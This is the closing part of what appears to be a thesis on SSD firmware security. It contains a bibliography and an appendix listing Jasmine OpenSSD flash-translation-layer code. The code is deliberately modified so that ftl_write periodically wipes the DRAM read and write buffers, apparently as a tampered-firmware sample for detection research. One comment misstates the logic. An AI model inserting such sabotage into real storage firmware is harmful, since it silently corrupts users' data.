[57] Tim Kornau. Return oriented programming for the ARM architecture. PhD thesis, Master’s thesis, Ruhr-Universität Bochum, 2010.

[58] Jason Kulick, Tian Lu, Carlos Ortega, Rob Engelhardt, Yiyu Shi, Gary H Bernstein, and John Timler. Enhancing pcb hardware security through randomized encoding of logic on hybrid quilt-packaged ic-pcb system. Technical report, Indiana Integrated Circuits, LLC SouthBend United States, 2019.

[59] David Kushner. The real story of stuxnet. ieee Spectrum, 3(50):48–53, 2013. 110 BIBLIOGRAPHY

[60] Michael Lackner, Reinhard Berlach, Reinhold Weiss, and Christian Steger. Countering type confusion and buffer overflow attacks on java smart cards by data type sensitive obfuscation. In Proceedings of the First Workshop on Cryptography and Security in Computing Systems, pages 19–24. ACM, 2014.

[61] Ralph Langner. Stuxnet: Dissecting a cyberwarfare weapon. IEEE Security & Privacy, 9(3):49–51, 2011.

[62] Adrian P Lauf, Richard A Peters, and William H Robinson. A distributed intrusion de- tection system for resource-constrained devices in ad-hoc networks. Ad Hoc Networks, 8(3):253–266, 2010.

[63] Long Le. Arm exploitation ropmap. In BlackHat 2011 Briefings and Training. Black- Hat, 2011.

[64] Sang-Won Lee, Dong-Joo Park, Tae-Sun Chung, Dong-Ho Lee, Sangwon Park, and Ha-Joo Song. A log buffer-based flash translation layer using fully-associative sector translation. ACM Transactions on Embedded Computing Systems (TECS), 6(3):18, 2007.

[65] Sang-Phil Lim, Sang-Won Lee, and Bongki Moon. Faster ftl for enterprise-class flash memory ssds. In Storage Network Architecture and Parallel I/Os (SNAPI), 2010 International Workshop on, pages 3–12. IEEE, 2010.

[66] Sangphil Lim. The Jasmine OpenSSD Platform: Technical Reference Manual. VLBD

Lab, South Korea, January 2012. http://www.openssd-project.org.

[67] Nathan Manworren, Joshua Letwat, and Olivia Daily. Why you should care about the target data breach. Business Horizons, 59(3):257–266, 2016. BIBLIOGRAPHY 111

[68] Luke Mather, Elisabeth Oswald, Joe Bandenburg, and Marcin Wójcik. Does my device leak information? an a priori statistical power analysis of leakage detection tests. In International Conference on the Theory and Application of Cryptology and Information Security, pages 486–505. Springer, 2013.

[69] John McDonald. Defeating solaris/sparc non-executable stack protection. Bugtraq, Mar, 1999.

[70] Carlo Meijer and Bernard van Gastel. Self-encrypting deception: Weaknesses in the encryption of solid state drives. In 40th IEEE Symposium on Security and Privacy, San Francisco, CA, May 20-22, 2019.

[71] Jacob Melton, Ryan Rakvic, James Shey, Hau Ngo, Owens Walker, Justin Blanco, Dane Brown, Luke McDowell, and Kevin D Fairbanks. Inferring file system of solid state drives based on current consumption. In 2017 IEEE 7th Annual International Conference on CYBER Technology in Automation, Control, and Intelligent Systems (CYBER), pages 72–76. IEEE, 2017.

[72] Aleph One. Smashing the stack for fun and profit (1996). Phrack, 7:49, 2007.

[73] Vasilis Pappas. kbouncer: Efficient and transparent rop mitigation. tech. rep. Citeseer, 2012.

[74] Raspberry Pi—Teach. learn, and make with raspberry pi. Raspberry Pi [Internet].[cited 13 Sep 2017]. https://www. raspberrypi. org, 2017.

[75] Bruce Potter. Microsoft sdl threat modelling tool. Network Security, 2009(1):15–18, 2009.

[76] Michael Riley, Ben Elgin, Dune Lawrence, and Carol Matlack. Missed alarms and 40 112 BIBLIOGRAPHY

million stolen credit card numbers: How target blew it. Bloomberg Businessweek, 13, 2014.

[77] Jordan Robertson and Michael Riley. The big hack: how china used a tiny chip to infiltrate us companies. Bloomberg Businessweek, 4, 2018.

[78] John T Robinson. Analysis of steady-state segment storage utilizations in a log- structured file system with least-utilized segment cleaning. ACM SIGOPS Operating Systems Review, 30(4):29–32, 1996.

[79] Jonathan Salwan. Ropgadget. https://github.com/JonathanSalwan/ROPgadget. Accessed: 2017-04-25.

[80] Sriram Sankar, Mark Shaw, Kushagra Vaid, and Sudhanva Gurumurthi. Datacen- ter scale evaluation of the impact of temperature on hard disk drive failures. ACM Transactions on Storage (TOS), 9(2):6, 2013.

[81] Felix Schuster, Thomas Tendyck, Jannik Pewny, Andreas Maaß, Martin Steegmanns, Moritz Contag, and Thorsten Holz. Evaluating the effectiveness of current anti-rop defenses. In International Workshop on Recent Advances in Intrusion Detection, pages 88–108. Springer, 2014.

[82] Hovav Shacham. The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86). In Proceedings of the 14th ACM conference on Computer and communications security, pages 552–561. ACM, 2007.

[83] James Shey, Justin A Blanco, Owens Walker, Thomas Tedesso, Hau Ngo, Ryan Rakvic, and Kevin Fairbanks. Monitoring device current to characterize trim operations of solid-state drives. IEEE Trans. Inf. Forens. Security, to be published, 2018. BIBLIOGRAPHY 113

[84] Yang Shi, Fangyu Li, WenZhan Song, Xiang-Yang Li, and Jin Ye. Energy audition based cyber-physical attack detection system in iot. In Proceedings of the ACM Turing Celebration Conference - China, ACM TURC ’19, pages 27:1–27:5, New York, NY, USA, 2019. ACM. ISBN 978-1-4503-7158-2. doi: 10.1145/3321408.3321588. URL

http://doi.acm.org/10.1145/3321408.3321588.

[85] Adam Shostack. Threat modeling: Designing for security. John Wiley & Sons, 2014.

[86] Michael Sipser. Introduction to the Theory of Computation. International Thomson Publishing, 2nd edition, 2006. ISBN 0534950973.

[87] Andrew N. Sloss, Dominic Symes, and Chris Wright. ARM System Developer’s Guide. Elsevier, 2004. ISBN 1558608745.

[88] Tiva TM4C123GH6PM Microcontroller. Texas Instruments Incorporated, 2014. Rev. E.

[89] TivaWareTM Peripheral Driver Library. Texas Instruments Incorporated, 2016. Version 2.1.3.156.

[90] Tim Thornburgh. Social engineering: the dark art. In Proceedings of the 1st annual conference on Information security curriculum development, pages 133–135. ACM, 2004.

[91] Peter Torr. Demystifying the threat modeling process. IEEE Security & Privacy, 3 (5):66–70, 2005.

[92] Frank Vahid and Tony Givargis. Embedded system design: A unified hardware/- software approach. Department of Computer Science and Engineering University of California, 1999. 114 BIBLIOGRAPHY

[93] Xiaoxiao Wang, Hassan Salmani, Mohammad Tehranipoor, and Jim Plusquellic. Hard- ware trojan detection and isolation using current integration and localized current analysis. In Defect and Fault Tolerance of VLSI Systems, 2008. DFTVS’08. IEEE International Symposium on, pages 87–95. IEEE, 2008.

[94] Nathanael R Weidler, Dane Brown, Samuel A Mitchell, Joel Anderson, Jonathan R Williams, Austin Costley, Chase Kunz, Christopher Wilkinson, Remy Wehbe, and Ryan Gerdes. Return-oriented programming on a resource constrained device. Sus- tainable Computing: Informatics and Systems, 22:244–256, 2019.

[95] Stephen Weis. Protecting data in-use from firmware and physical attacks. In Black Hat. 2014.

[96] Peter Welch. The use of fast fourier transform for the estimation of power spectra: a method based on time averaging over short, modified periodograms. IEEE Transac- tions on audio and electroacoustics, 15(2):70–73, 1967.

[97] Manuel Wendt, Matthias Grumer, Christian Steger, R Weib, Ulrich Neffe, and A Muhlberger. Energy consumption measurement technique for automatic instruction set characterization of embedded processors. In Instrumentation and Measurement Technology Conference Proceedings, 2007. IMTC 2007. IEEE, pages 1–4. IEEE, 2007.

[98] Jacob Wurm, Khoa Hoang, Orlando Arias, Ahmad-Reza Sadeghi, and Yier Jin. Se- curity analysis on consumer and industrial iot devices. In 2016 21st Asia and South Pacific Design Automation Conference (ASP-DAC), pages 519–524. IEEE, 2016.

[99] Joshep Yiu. The Definitive Guide to ARM Cortex-M3 and Cortex-M4 Processors. Newnes, 3 edition, 2014. ISBN 978-0124080829.

[100] Balgeun Yoo, Youjip Won, Seokhei Cho, Sooyong Kang, Jongmoo Choi, and Sungroh BIBLIOGRAPHY 115

Yoon. Ssd characterization: From energy consumption’s perspective. In HotStorage, 2011.

[101] Johnson Z, Varon A, Blanco JA, Rakvic R, Shey J, Ngo H, Brown D, and Walker O. Classifying solid state drive firmware via side-channel current draw analysis. Proceed- ings of the 4th IEEE International Conference on Big Data Intelligence and Computing, August 2018.

[102] Jonas Zaddach, Anil Kurmus, Davide Balzarotti, Erik-Oliver Blass, Aurélien Fran- cillon, Travis Goodspeed, Moitrayee Gupta, and Ioannis Koltsidas. Implementation and implications of a stealth hard-drive backdoor. In Proceedings of the 29th annual computer security applications conference, pages 279–288. ACM, 2013.

[103] Lianying Zhao and Mohammad Mannan. Tee-aided write protection against privileged data tampering. arXiv preprint arXiv:1905.10723, 2019. Appendices

116 Appendix A

Modified FTL Code - Clearing DRAM

The code below is the ftl.c file for the Greedy firmware provided by the Jasmine project modified to clear DRAM with 12.5% probability after every 1000 calls to ftl_write, which we call a Greedy-12.5% firmware. We add a global variable numWrites to track the number of calls to ftl_write, and a check within ftl_write to clear the DRAM buffer based on which bank is selected for writing.

1 // Copyright 2011 INDILINX Co., Ltd.

2 //

3 // This file is part of Jasmine.

4 //

5 // Jasmine is : you can redistribute it and/or modify

6 // it under the terms of the GNU General Public License as published by

7 // the , either version 3 of the License, or

8 // (at your option) any later version.

9 //

10 // Jasmine is distributed in the hope that it will be useful,

11 // but WITHOUT ANY WARRANTY; without even the implied warranty of

12 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

13 // GNU General Public License for more details.

14 //

15 // You should have received a copy of the GNU General Public License

117 118 Appendix A. Modified FTL Code - Clearing DRAM

16 // along with Jasmine. See the file COPYING.

17 // If not, see .

18 //

19 // GreedyFTL source file

20 //

21 // Author; Sang-Phil Lim (SKKU VLDB Lab.)

22 //

23 // - support POR

24 // + fixed metadata area (Misc. block/Map block)

25 // + logging entire FTL metadata when each ATA commands(idle/ready/standby) was issued

26 //

28 #include "jasmine.h"

30 // Keep track of how many writes have been performed

31 unsigned int numWrites = 0;

33 //------

34 // macro

35 //------

36 #define VC_MAX 0xCDCD

37 #define MISCBLK_VBN 0x1 // vblock #1 <- misc metadata

38 #define MAPBLKS_PER_BANK (((PAGE_MAP_BYTES / NUM_BANKS) + BYTES_PER_PAGE - 1) / BYTES_PER_PAGE)

39 #define META_BLKS_PER_BANK (1 + 1 + MAPBLKS_PER_BANK) // include block #0, misc block

41 // the number of sectors of misc. metadata info.

42 #define NUM_MISC_META_SECT((sizeof(misc_metadata) + BYTES_PER_SECTOR - 1)/ BYTES_PER_SECTOR) 119

43 #define NUM_VCOUNT_SECT ((VBLKS_PER_BANK* sizeof(UINT16) + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR)

45 //------

46 // metadata structure

47 //------

48 typedef struct _ftl_statistics

49 {

50 UINT32 gc_cnt;

51 UINT32 page_wcount; // page write count

52 }ftl_statistics;

54 typedef struct _misc_metadata

55 {

56 UINT32 cur_write_vpn; // physical page for new write

57 UINT32 cur_miscblk_vpn; // current write vpn for logging the misc. metadata

58 UINT32 cur_mapblk_vpn[MAPBLKS_PER_BANK]; // current write vpn for logging the age mapping info.

59 UINT32 gc_vblock; // vblock number for garbage collection

60 UINT32 free_blk_cnt; // total number of free block count

61 UINT32 lpn_list_of_cur_vblock[PAGES_PER_BLK]; // logging lpn list of current write vblock for GC

62 }misc_metadata; // per bank

64 //------

65 // FTL metadata (maintain in SRAM)

66 //------

67 static misc_metadata g_misc_meta[NUM_BANKS];

68 static ftl_statistics g_ftl_statistics[NUM_BANKS];

69 static UINT32 g_bad_blk_count[NUM_BANKS]; 120 Appendix A. Modified FTL Code - Clearing DRAM

71 // SATA read/write buffer pointer id

72 UINT32 g_ftl_read_buf_id;

73 UINT32 g_ftl_write_buf_id;

75 //------

76 // NAND layout

77 //------

78 // block #0: scan list, firmware binary image, etc.

79 // block #1: FTL misc. metadata

80 // block #2 ~ #31: page mapping table

81 // block #32: a free block for gc

82 // block #33~: user data blocks

84 //------

85 // macro functions

86 //------

87 #define is_full_all_blks(bank) (g_misc_meta[bank].free_blk_cnt == 1)

88 #define inc_full_blk_cnt(bank) (g_misc_meta[bank].free_blk_cnt--)

89 #define dec_full_blk_cnt(bank) (g_misc_meta[bank].free_blk_cnt++)

90 #define inc_mapblk_vpn(bank, mapblk_lbn) (g_misc_meta[bank].cur_mapblk_vpn[ mapblk_lbn]++)

91 #define inc_miscblk_vpn(bank) (g_misc_meta[bank].cur_miscblk_vpn ++)

93 // page-level striping technique (I/O parallelism)

94 #define get_num_bank(lpn) ((lpn) % NUM_BANKS)

95 #define get_bad_blk_cnt(bank) (g_bad_blk_count[bank])

96 #define get_cur_write_vpn(bank) (g_misc_meta[bank].cur_write_vpn)

97 #define set_new_write_vpn(bank, vpn) (g_misc_meta[bank].cur_write_vpn = vpn)

98 #define get_gc_vblock(bank) (g_misc_meta[bank].gc_vblock) 121

99 #define set_gc_vblock(bank, vblock) (g_misc_meta[bank].gc_vblock = vblock)

100 #define set_lpn(bank, page_num, lpn) (g_misc_meta[bank]. lpn_list_of_cur_vblock[page_num] = lpn)

101 #define get_lpn(bank, page_num) (g_misc_meta[bank]. lpn_list_of_cur_vblock[page_num])

102 #define get_miscblk_vpn(bank) (g_misc_meta[bank].cur_miscblk_vpn)

103 #define set_miscblk_vpn(bank, vpn) (g_misc_meta[bank].cur_miscblk_vpn = vpn )

104 #define get_mapblk_vpn(bank, mapblk_lbn) (g_misc_meta[bank]. cur_mapblk_vpn[mapblk_lbn])

105 #define set_mapblk_vpn(bank, mapblk_lbn, vpn) (g_misc_meta[bank]. cur_mapblk_vpn[mapblk_lbn] = vpn)

106 #define CHECK_LPAGE(lpn) ASSERT((lpn) < NUM_LPAGES)

107 #define CHECK_VPAGE(vpn) ASSERT((vpn) < (VBLKS_PER_BANK * PAGES_PER_BLK))

109 //------

110 // FTL internal function prototype

111 //------

112 static void format(void);

113 static void write_format_mark(void);

114 static void sanity_check(void);

115 static void load_pmap_table(void);

116 static void load_misc_metadata(void);

117 static void init_metadata_sram(void);

118 static void load_metadata(void);

119 static void logging_pmap_table(void);

120 static void logging_misc_metadata(void);

121 static void write_page(UINT32 const lpn, UINT32 const sect_offset, UINT32 const num_sectors);

122 static void set_vpn(UINT32 const lpn, UINT32 const vpn); 122 Appendix A. Modified FTL Code - Clearing DRAM

123 static void garbage_collection(UINT32 const bank);

124 static void set_vcount(UINT32 const bank, UINT32 const vblock, UINT32 const vcount);

125 static BOOL32 is_bad_block(UINT32 const bank, UINT32 const vblock);

126 static BOOL32 check_format_mark(void);

127 static UINT32 get_vcount(UINT32 const bank, UINT32 const vblock);

128 static UINT32 get_vpn(UINT32 const lpn);

129 static UINT32 get_vt_vblock(UINT32 const bank);

130 static UINT32 assign_new_write_vpn(UINT32 const bank);

132 static void sanity_check(void)

133 {

134 UINT32 dram_requirement = RD_BUF_BYTES + WR_BUF_BYTES + COPY_BUF_BYTES + FTL_BUF_BYTES

135 + HIL_BUF_BYTES + TEMP_BUF_BYTES + BAD_BLK_BMP_BYTES + PAGE_MAP_BYTES + VCOUNT_BYTES;

137 if ((dram_requirement > DRAM_SIZE) || // DRAM metadata size check

138 (sizeof(misc_metadata) > BYTES_PER_PAGE)) // misc metadata size check

139 {

140 led_blink();

141 while (1);

142 }

143 }

144 static void build_bad_blk_list(void)

145 {

146 UINT32 bank, num_entries, result, vblk_offset;

147 scan_list_t* scan_list = (scan_list_t*) TEMP_BUF_ADDR;

149 mem_set_dram(BAD_BLK_BMP_ADDR, NULL, BAD_BLK_BMP_BYTES); 123

151 disable_irq();

153 flash_clear_irq();

155 for (bank = 0; bank < NUM_BANKS; bank++)

156 {

157 SETREG(FCP_CMD,FC_COL_ROW_READ_OUT);

158 SETREG(FCP_BANK, REAL_BANK(bank));

159 SETREG(FCP_OPTION,FO_E);

160 SETREG(FCP_DMA_ADDR, (UINT32) scan_list);

161 SETREG(FCP_DMA_CNT,SCAN_LIST_SIZE);

162 SETREG(FCP_COL, 0);

163 SETREG(FCP_ROW_L(bank), SCAN_LIST_PAGE_OFFSET);

164 SETREG(FCP_ROW_H(bank), SCAN_LIST_PAGE_OFFSET);

166 SETREG(FCP_ISSUE,NULL);

167 while ((GETREG(WR_STAT) & 0x00000001) != 0);

168 while (BSP_FSM(bank) != BANK_IDLE);

170 num_entries = NULL;

171 result = OK;

173 if (BSP_INTR(bank) & FIRQ_DATA_CORRUPT)

174 {

175 result = FAIL;

176 }

177 else

178 {

179 UINT32 i;

181 num_entries = read_dram_16(&(scan_list->num_entries)); 124 Appendix A. Modified FTL Code - Clearing DRAM

183 if (num_entries > SCAN_LIST_ITEMS)

184 {

185 result = FAIL;

186 }

187 else

188 {

189 for (i = 0; i < num_entries; i++)

190 {

191 UINT16 entry = read_dram_16(scan_list->list + i);

192 UINT16 pblk_offset = entry & 0x7FFF;

194 if (pblk_offset == 0 || pblk_offset >= PBLKS_PER_BANK)

195 {

196 #if OPTION_REDUCED_CAPACITY == FALSE

197 result = FAIL;

198 #endif

199 }

200 else

201 {

202 write_dram_16(scan_list->list + i, pblk_offset);

203 }

204 }

205 }

206 }

208 if (result == FAIL)

209 {

210 num_entries = 0; // We cannot trust this scan list. Perhaps a software bug.

211 } 125

212 else

213 {

214 write_dram_16(&(scan_list->num_entries), 0);

215 }

217 g_bad_blk_count[bank] = 0;

219 for (vblk_offset = 1; vblk_offset < VBLKS_PER_BANK; vblk_offset++)

220 {

221 BOOL32 bad = FALSE;

223 #if OPTION_2_PLANE

224 {

225 UINT32 pblk_offset;

227 pblk_offset = vblk_offset * NUM_PLANES;

229 // fix bug@jasmine v.1.1.0

230 if (mem_search_equ_dram(scan_list, sizeof(UINT16), num_entries + 1, pblk_offset) < num_entries + 1)

231 {

232 bad = TRUE;

233 }

235 pblk_offset = vblk_offset * NUM_PLANES + 1;

237 // fix bug@jasmine v.1.1.0

238 if (mem_search_equ_dram(scan_list, sizeof(UINT16), num_entries + 1, pblk_offset) < num_entries + 1)

239 {

240 bad = TRUE; 126 Appendix A. Modified FTL Code - Clearing DRAM

241 }

242 }

243 #else

244 {

245 // fix bug@jasmine v.1.1.0

246 if (mem_search_equ_dram(scan_list, sizeof(UINT16), num_entries + 1, vblk_offset) < num_entries + 1)

247 {

248 bad = TRUE;

249 }

250 }

251 #endif

253 if (bad)

254 {

255 g_bad_blk_count[bank]++;

256 set_bit_dram(BAD_BLK_BMP_ADDR + bank*(VBLKS_PER_BANK/8 + 1), vblk_offset);

257 }

258 }

259 }

260 }

262 void ftl_open(void)

263 {

264 // debugging example 1 - use breakpoint statement!

265 /* *(UINT32*)0xFFFFFFFE = 10; */

267 /* UINT32 volatile g_break = 0; */

268 /* while (g_break == 0); */ 127

270 led(0);

271 sanity_check();

272 //------

273 // read scan lists from NAND flash

274 // and build bitmap of bad blocks

275 //------

276 build_bad_blk_list();

278 //------

279 // If necessary, do low-level format

280 // format() should be called after loading scan lists, because format() calls is_bad_block().

281 //------

282 /* if (check_format_mark() == FALSE) */

283 if (TRUE)

284 {

285 uart_print("do format");

286 format();

287 uart_print("end format");

288 }

289 // load FTL metadata

290 else

291 {

292 load_metadata();

293 }

294 g_ftl_read_buf_id = 0;

295 g_ftl_write_buf_id = 0;

297 // This example FTL can handle runtime bad block interrupts and read fail (uncorrectable bit errors) interrupts

298 flash_clear_irq(); 128 Appendix A. Modified FTL Code - Clearing DRAM

300 SETREG(INTR_MASK, FIRQ_DATA_CORRUPT | FIRQ_BADBLK_L | FIRQ_BADBLK_H);

301 SETREG(FCONF_PAUSE, FIRQ_DATA_CORRUPT | FIRQ_BADBLK_L | FIRQ_BADBLK_H);

303 enable_irq();

304 }

305 void ftl_flush(void)

306 {

307 /* ptimer_start(); */

308 logging_pmap_table();

309 logging_misc_metadata();

310 /* ptimer_stop_and_uart_print(); */

311 }

312 // Testing FTL protocol APIs

313 void ftl_test_write(UINT32 const lba, UINT32 const num_sectors)

314 {

315 ASSERT(lba + num_sectors <= NUM_LSECTORS);

316 ASSERT(num_sectors > 0);

318 ftl_write(lba, num_sectors);

319 }

320 void ftl_read(UINT32 const lba, UINT32 const num_sectors)

321 {

322 UINT32 remain_sects, num_sectors_to_read;

323 UINT32 lpn, sect_offset;

324 UINT32 bank, vpn;

326 lpn = lba / SECTORS_PER_PAGE;

327 sect_offset = lba % SECTORS_PER_PAGE;

328 remain_sects = num_sectors; 129

330 while (remain_sects != 0)

331 {

332 if ((sect_offset + remain_sects) < SECTORS_PER_PAGE)

333 {

334 num_sectors_to_read = remain_sects;

335 }

336 else

337 {

338 num_sectors_to_read = SECTORS_PER_PAGE - sect_offset;

339 }

340 bank = get_num_bank(lpn); // page striping

341 vpn = get_vpn(lpn);

342 CHECK_VPAGE(vpn);

344 if (vpn != NULL)

345 {

346 nand_page_ptread_to_host(bank,

347 vpn / PAGES_PER_BLK,

348 vpn % PAGES_PER_BLK,

349 sect_offset,

350 num_sectors_to_read);

351 }

352 // The host is requesting to read a logical page that has never been written to.

353 else

354 {

355 UINT32 next_read_buf_id = (g_ftl_read_buf_id + 1) % NUM_RD_BUFFERS;

357 #if OPTION_FTL_TEST == 0

358 while (next_read_buf_id == GETREG(SATA_RBUF_PTR)); // wait if the read buffer is full (slow host) 130 Appendix A. Modified FTL Code - Clearing DRAM

359 #endif

361 // fix bug @ v.1.0.6

362 // Send 0xFF...FF to host when the host request to read the sector that has never been written.

363 // In old version, for example, if the host request to read unwritten sector 0 after programming in sector 1, Jasmine would send 0x00...00 to host.

364 // However, if the host already wrote to sector 1, Jasmine would send 0xFF...FF to host when host request to read sector 0. ( ftl_read() in ftl_xxx/ftl.c)

365 mem_set_dram(RD_BUF_PTR(g_ftl_read_buf_id) + sect_offset* BYTES_PER_SECTOR,

366 0xFFFFFFFF, num_sectors_to_read*BYTES_PER_SECTOR);

368 flash_finish();

370 SETREG(BM_STACK_RDSET, next_read_buf_id); // change bm_read_limit

371 SETREG(BM_STACK_RESET, 0x02); // change bm_read_limit

373 g_ftl_read_buf_id = next_read_buf_id;

374 }

375 sect_offset = 0;

376 remain_sects -= num_sectors_to_read;

377 lpn++;

378 }

379 }

380 void ftl_write(UINT32 const lba, UINT32 const num_sectors)

381 {

382 numWrites++; // Increment the write counter

383 UINT32 bank; //, vblock, vcount_val; 131

385 UINT32 remain_sects, num_sectors_to_write;

386 UINT32 lpn, sect_offset;

388 lpn = lba / SECTORS_PER_PAGE;

389 sect_offset = lba % SECTORS_PER_PAGE;

390 remain_sects = num_sectors;

392 // After every 1000 writes, format the current bank with 50% probability

393 if (numWrites%1000 == 0)

394 {

395 bank = get_num_bank(lpn); // page striping

396 if (bank < 1) // 12.5% of the banks

397 {

398 // uart_printf("Clearing DRAM write buffer...\n");

399 //------

400 // Nullify the Read and Write buffers in DRAM

401 //------

402 mem_set_dram(DRAM_BASE, NULL,RD_BUF_BYTES + WR_BUF_BYTES );

403 }

404 }

405 while (remain_sects != 0)

406 {

407 if ((sect_offset + remain_sects) < SECTORS_PER_PAGE)

408 {

409 num_sectors_to_write = remain_sects;

410 }

411 else

412 {

413 num_sectors_to_write = SECTORS_PER_PAGE - sect_offset;

414 } 132 Appendix A. Modified FTL Code - Clearing DRAM

415 // single page write individually

416 write_page(lpn, sect_offset, num_sectors_to_write);

418 sect_offset = 0;

419 remain_sects -= num_sectors_to_write;

420 lpn++;

421 }

422 }

423 static void write_page(UINT32 const lpn, UINT32 const sect_offset, UINT32 const num_sectors)

424 {

425 CHECK_LPAGE(lpn);

426 ASSERT(sect_offset < SECTORS_PER_PAGE);

427 ASSERT(num_sectors > 0 && num_sectors <= SECTORS_PER_PAGE);

429 UINT32 bank, old_vpn, new_vpn;

430 UINT32 vblock, page_num, page_offset, column_cnt;

432 bank = get_num_bank(lpn); // page striping

433 page_offset = sect_offset;

434 column_cnt = num_sectors;

436 new_vpn = assign_new_write_vpn(bank);

437 old_vpn = get_vpn(lpn);

439 CHECK_VPAGE (old_vpn);

440 CHECK_VPAGE (new_vpn);

441 ASSERT(old_vpn != new_vpn);

443 g_ftl_statistics[bank].page_wcount++; 133

445 // if old data already exist,

446 if (old_vpn != NULL)

447 {

448 vblock = old_vpn / PAGES_PER_BLK;

449 page_num = old_vpn % PAGES_PER_BLK;

451 // ------

452 // `Partial programming'

453 // we could not determine whether the new data is loaded in the SATA write buffer.

454 // Thus, read the left/right hole sectors of a valid page and copy into the write buffer.

455 // And then, program whole valid data

456 // ------

457 if (num_sectors != SECTORS_PER_PAGE)

458 {

459 // Performance optimization (but, not proved)

460 // To reduce flash memory access, valid hole copy into SATA write buffer after reading whole page

461 // Thus, in this case, we need just one full page read + one or two mem_copy

462 if ((num_sectors <= 8) && (page_offset != 0))

463 {

464 // one page async read

465 nand_page_read(bank,

466 vblock ,

467 page_num , 134 Appendix A. Modified FTL Code - Clearing DRAM

468 FTL_BUF(bank));

469 // copy `left hole sectors' into SATA write buffer

470 if (page_offset != 0)

471 {

472 mem_copy(WR_BUF_PTR(g_ftl_write_buf_id),

473 FTL_BUF(bank),

474 page_offset * BYTES_PER_SECTOR);

475 }

476 // copy `right hole sectors' into SATA write buffer

477 if ((page_offset + column_cnt) < SECTORS_PER_PAGE)

478 {

479 UINT32 const rhole_base = (page_offset + column_cnt) * BYTES_PER_SECTOR;

481 mem_copy(WR_BUF_PTR(g_ftl_write_buf_id) + rhole_base,

482 FTL_BUF(bank) + rhole_base,

483 BYTES_PER_PAGE - rhole_base);

484 }

485 }

486 // left/right hole async read operation (two partial page read)

487 else

488 {

489 // read `left hole sectors'

490 if (page_offset != 0)

491 {

492 nand_page_ptread(bank,

493 vblock ,

494 page_num ,

495 0,

496 page_offset,

497 WR_BUF_PTR(g_ftl_write_buf_id), 135

498 RETURN_ON_ISSUE);

499 }

500 // read `right hole sectors'

501 if ((page_offset + column_cnt) < SECTORS_PER_PAGE)

502 {

503 nand_page_ptread(bank,

504 vblock ,

505 page_num ,

506 page_offset + column_cnt,

507 SECTORS_PER_PAGE - (page_offset + column_cnt),

508 WR_BUF_PTR(g_ftl_write_buf_id),

509 RETURN_ON_ISSUE);

510 }

511 }

512 }

513 // full page write

514 page_offset = 0;

515 column_cnt = SECTORS_PER_PAGE;

516 // invalid old page (decrease vcount)

517 set_vcount(bank, vblock, get_vcount(bank, vblock) - 1);

518 }

519 vblock = new_vpn / PAGES_PER_BLK;

520 page_num = new_vpn % PAGES_PER_BLK;

521 ASSERT(get_vcount(bank,vblock) < (PAGES_PER_BLK - 1));

523 // write new data (make sure that the new data is ready in the write buffer frame)

524 // (c.f FO_B_SATA_W flag in flash.h)

525 nand_page_ptprogram_from_host(bank,

526 vblock , 136 Appendix A. Modified FTL Code - Clearing DRAM

527 page_num ,

528 page_offset,

529 column_cnt);

530 // update metadata

531 set_lpn(bank, page_num, lpn);

532 set_vpn(lpn, new_vpn);

533 set_vcount(bank, vblock, get_vcount(bank, vblock) + 1);

534 }

535 // get vpn from PAGE_MAP

536 static UINT32 get_vpn(UINT32 const lpn)

537 {

538 CHECK_LPAGE(lpn);

539 return read_dram_32(PAGE_MAP_ADDR + lpn * sizeof(UINT32));

540 }

541 // set vpn to PAGE_MAP

542 static void set_vpn(UINT32 const lpn, UINT32 const vpn)

543 {

544 CHECK_LPAGE(lpn);

545 ASSERT(vpn >= (META_BLKS_PER_BANK * PAGES_PER_BLK) && vpn < ( VBLKS_PER_BANK*PAGES_PER_BLK));

547 write_dram_32(PAGE_MAP_ADDR + lpn * sizeof(UINT32), vpn);

548 }

549 // get valid page count of vblock

550 static UINT32 get_vcount(UINT32 const bank, UINT32 const vblock)

551 {

552 UINT32 vcount;

554 ASSERT(bank < NUM_BANKS);

555 ASSERT((vblock >= META_BLKS_PER_BANK) && (vblock < VBLKS_PER_BANK)); 137

557 vcount = read_dram_16(VCOUNT_ADDR + (((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16)));

558 ASSERT((vcount < PAGES_PER_BLK) || (vcount == VC_MAX));

560 return vcount;

561 }

562 // set valid page count of vblock

563 static void set_vcount(UINT32 const bank, UINT32 const vblock, UINT32 const vcount)

564 {

565 ASSERT(bank < NUM_BANKS);

566 ASSERT((vblock >= META_BLKS_PER_BANK) && (vblock < VBLKS_PER_BANK));

567 ASSERT((vcount < PAGES_PER_BLK) || (vcount == VC_MAX));

569 write_dram_16(VCOUNT_ADDR + (((bank * VBLKS_PER_BANK) + vblock) * sizeof( UINT16)), vcount);

570 }

571 static UINT32 assign_new_write_vpn(UINT32 const bank)

572 {

573 ASSERT(bank < NUM_BANKS);

575 UINT32 write_vpn;

576 UINT32 vblock;

578 write_vpn = get_cur_write_vpn(bank);

579 vblock = write_vpn / PAGES_PER_BLK;

581 // NOTE: if next new write page's offset is

582 // the last page offset of vblock (i.e. PAGES_PER_BLK - 1),

583 if ((write_vpn % PAGES_PER_BLK) == (PAGES_PER_BLK - 2))

584 { 138 Appendix A. Modified FTL Code - Clearing DRAM

585 // then, because of the flash controller limitation

586 // (prohibit accessing a spare area (i.e. OOB)),

587 // thus, we persistenly write a lpn list into last page of vblock.

588 mem_copy(FTL_BUF(bank), g_misc_meta[bank].lpn_list_of_cur_vblock, sizeof(UINT32) * PAGES_PER_BLK);

589 // fix minor bug

590 nand_page_ptprogram(bank, vblock, PAGES_PER_BLK - 1, 0,

591 ((sizeof(UINT32) * PAGES_PER_BLK + BYTES_PER_SECTOR - 1 ) / BYTES_PER_SECTOR), FTL_BUF(bank));

593 mem_set_sram(g_misc_meta[bank].lpn_list_of_cur_vblock, 0x00000000, sizeof(UINT32) * PAGES_PER_BLK);

595 inc_full_blk_cnt(bank);

597 // do garbage collection if necessary

598 if (is_full_all_blks(bank))

599 {

600 garbage_collection(bank);

601 return get_cur_write_vpn(bank);

602 }

603 do

604 {

605 vblock++;

607 ASSERT(vblock != VBLKS_PER_BANK);

608 }while (get_vcount(bank, vblock) == VC_MAX);

609 }

610 // write page -> next block

611 if (vblock != (write_vpn / PAGES_PER_BLK)) 139

612 {

613 write_vpn = vblock * PAGES_PER_BLK;

614 }

615 else

616 {

617 write_vpn++;

618 }

619 set_new_write_vpn(bank, write_vpn);

621 return write_vpn;

622 }

623 static BOOL32 is_bad_block(UINT32 const bank, UINT32 const vblk_offset)

